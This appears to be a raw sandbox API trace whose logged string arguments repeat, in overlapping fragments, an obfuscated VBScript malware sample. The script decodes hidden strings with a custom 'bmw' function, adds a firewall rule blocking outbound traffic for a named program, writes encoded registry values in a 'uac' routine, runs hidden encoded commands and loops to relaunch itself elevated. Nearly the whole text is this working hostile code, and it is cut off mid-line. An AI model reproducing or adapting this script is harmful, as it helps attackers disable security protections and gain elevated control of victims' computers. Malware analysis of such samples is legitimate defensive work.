CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0226.300] wcsncmp (_String1=",Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.300] wcsncmp (_String1="Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0226.301] wcsncmp (_String1="en(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.301] wcsncmp (_String1="n(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 